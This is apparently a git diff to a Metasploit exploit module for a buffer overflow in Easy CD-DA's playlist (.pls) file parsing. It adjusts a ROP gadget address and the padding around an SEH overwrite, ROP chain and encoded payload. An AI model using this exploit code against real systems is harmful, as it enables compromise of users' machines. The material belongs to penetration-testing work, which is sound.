diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 84ee3c0b55..a50f780a28 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote rop_nop = [ - 0x1003d55c # RETN (ROP NOP) [audconv.dll] + 0x1003d55d # RETN (ROP NOP) [audconv.dll] ].flatten.pack('V*') # ROP chain generated by mona.py - See corelan.be @@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit << generate_seh_record(target.ret) sploit << rand_text_alpha_upper(80) sploit << rop_nop - sploit << make_nops(8) + sploit << rand_text_alpha_upper(4) sploit << rop_gadgets - sploit << make_nops(16) + sploit << make_nops(4) sploit << payload.encoded sploit << rand_text_alpha_upper(10000)